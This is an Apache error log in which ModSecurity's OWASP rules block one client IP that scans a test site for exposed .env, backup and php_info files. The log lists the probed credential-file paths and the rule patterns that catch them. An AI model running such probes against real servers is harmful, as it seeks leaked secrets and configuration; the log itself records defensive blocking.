[Tue Nov 18 14:51:54.967107 2025] [:error] [pid 153863] [client 34.235.129.146:33108] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /system/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.bak"] [unique_id "aRx5-uo53hvRBsk5IfbhXgAAAAA"]
[Tue Nov 18 14:51:54.967239 2025] [:error] [pid 153863] [client 34.235.129.146:33108] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.bak"] [unique_id "aRx5-uo53hvRBsk5IfbhXgAAAAA"]
[Tue Nov 18 14:51:54.967381 2025] [:error] [pid 153863] [client 34.235.129.146:33108] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/system/.env.bak"] [unique_id "aRx5-uo53hvRBsk5IfbhXgAAAAA"]
[Tue Nov 18 14:51:54.977880 2025] [:error] [pid 166202] [client 34.235.129.146:33186] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.bak"] [unique_id "aRx5-rjjT4drRne9BbQurgAAAAk"]
[Tue Nov 18 14:51:54.978046 2025] [:error] [pid 166202] [client 34.235.129.146:33186] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.bak"] [unique_id "aRx5-rjjT4drRne9BbQurgAAAAk"]
[Tue Nov 18 14:51:54.978203 2025] [:error] [pid 166202] [client 34.235.129.146:33186] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.bak"] [unique_id "aRx5-rjjT4drRne9BbQurgAAAAk"]
[Tue Nov 18 14:51:54.978390 2025] [:error] [pid 166202] [client 34.235.129.146:33186] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.bak"] [unique_id "aRx5-rjjT4drRne9BbQurgAAAAk"]
[Tue Nov 18 14:51:54.987792 2025] [:error] [pid 166208] [client 34.235.129.146:33330] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRx5-gcM3DmIMKVPkqcQjgAAAAE"]
[Tue Nov 18 14:51:54.987954 2025] [:error] [pid 166208] [client 34.235.129.146:33330] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRx5-gcM3DmIMKVPkqcQjgAAAAE"]
[Tue Nov 18 14:51:54.988110 2025] [:error] [pid 166208] [client 34.235.129.146:33330] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRx5-gcM3DmIMKVPkqcQjgAAAAE"]
[Tue Nov 18 14:51:54.988260 2025] [:error] [pid 166208] [client 34.235.129.146:33330] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aRx5-gcM3DmIMKVPkqcQjgAAAAE"]
[Tue Nov 18 14:51:55.072435 2025] [authz_core:error] [pid 160901] [client 34.235.129.146:33252] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env.save
[Tue Nov 18 14:51:55.080219 2025] [:error] [pid 154301] [client 34.235.129.146:33310] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aRx5--18X441rUDF_U5eTQAAAAg"]
[Tue Nov 18 14:51:55.080396 2025] [:error] [pid 154301] [client 34.235.129.146:33310] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aRx5--18X441rUDF_U5eTQAAAAg"]
[Tue Nov 18 14:51:55.080553 2025] [:error] [pid 154301] [client 34.235.129.146:33310] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env"] [unique_id "aRx5--18X441rUDF_U5eTQAAAAg"]
[Tue Nov 18 14:51:55.081612 2025] [authz_core:error] [pid 160877] [client 34.235.129.146:33340] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env.old
[Tue Nov 18 14:51:55.210521 2025] [:error] [pid 160906] [client 34.235.129.146:33344] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.bak"] [unique_id "aRx5-_7FUeIdxVPAs5igwQAAAAY"]
[Tue Nov 18 14:51:55.210682 2025] [:error] [pid 160906] [client 34.235.129.146:33344] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.bak"] [unique_id "aRx5-_7FUeIdxVPAs5igwQAAAAY"]
[Tue Nov 18 14:51:55.210876 2025] [:error] [pid 160906] [client 34.235.129.146:33344] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.bak"] [unique_id "aRx5-_7FUeIdxVPAs5igwQAAAAY"]
[Tue Nov 18 14:51:55.211102 2025] [:error] [pid 160906] [client 34.235.129.146:33344] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/storage/.env.bak"] [unique_id "aRx5-_7FUeIdxVPAs5igwQAAAAY"]
[Tue Nov 18 14:51:55.212209 2025] [:error] [pid 163656] [client 34.235.129.146:33138] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.bak"] [unique_id "aRx5-8CoCYNOyUBImXwJMgAAAAc"]
[Tue Nov 18 14:51:55.212349 2025] [:error] [pid 163656] [client 34.235.129.146:33138] [client 34.235.129.146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.bak"] [unique_id "aRx5-8CoCYNOyUBImXwJMgAAAAc"]
[Tue Nov 18 14:51:55.212516 2025] [:error] [pid 163656] [client 34.235.129.146:33138] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.bak"] [unique_id "aRx5-8CoCYNOyUBImXwJMgAAAAc"]
[Tue Nov 18 14:51:55.212661 2025] [:error] [pid 163656] [client 34.235.129.146:33138] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/plugins/.env.bak"] [unique_id "aRx5-8CoCYNOyUBImXwJMgAAAAc"]
[Tue Nov 18 14:51:55.236427 2025] [authz_core:error] [pid 160239] [client 34.235.129.146:33200] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env.bak
[Tue Nov 18 14:52:28.223095 2025] [:error] [pid 166208] [client 34.235.129.146:57568] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aRx6HAcM3DmIMKVPkqcQkAAAAAE"]
[Tue Nov 18 14:52:28.224500 2025] [:error] [pid 166208] [client 34.235.129.146:57568] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aRx6HAcM3DmIMKVPkqcQkAAAAAE"]
[Tue Nov 18 14:52:28.224700 2025] [:error] [pid 166208] [client 34.235.129.146:57568] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aRx6HAcM3DmIMKVPkqcQkAAAAAE"]
[Tue Nov 18 14:52:28.483295 2025] [:error] [pid 166208] [client 34.235.129.146:57550] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aRx6HAcM3DmIMKVPkqcQkQAAAAE"]
[Tue Nov 18 14:52:28.483630 2025] [:error] [pid 166208] [client 34.235.129.146:57550] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aRx6HAcM3DmIMKVPkqcQkQAAAAE"]
[Tue Nov 18 14:52:28.483787 2025] [:error] [pid 166208] [client 34.235.129.146:57550] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aRx6HAcM3DmIMKVPkqcQkQAAAAE"]
[Tue Nov 18 14:52:28.683527 2025] [:error] [pid 160906] [client 34.235.129.146:57572] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aRx6HP7FUeIdxVPAs5igxAAAAAY"]
[Tue Nov 18 14:52:28.683900 2025] [:error] [pid 160906] [client 34.235.129.146:57572] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aRx6HP7FUeIdxVPAs5igxAAAAAY"]
[Tue Nov 18 14:52:28.684081 2025] [:error] [pid 160906] [client 34.235.129.146:57572] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aRx6HP7FUeIdxVPAs5igxAAAAAY"]
[Tue Nov 18 14:52:28.712073 2025] [:error] [pid 153863] [client 34.235.129.146:57504] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.bak"] [unique_id "aRx6HOo53hvRBsk5IfbhYQAAAAA"]
[Tue Nov 18 14:52:28.712419 2025] [:error] [pid 153863] [client 34.235.129.146:57504] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.bak"] [unique_id "aRx6HOo53hvRBsk5IfbhYQAAAAA"]
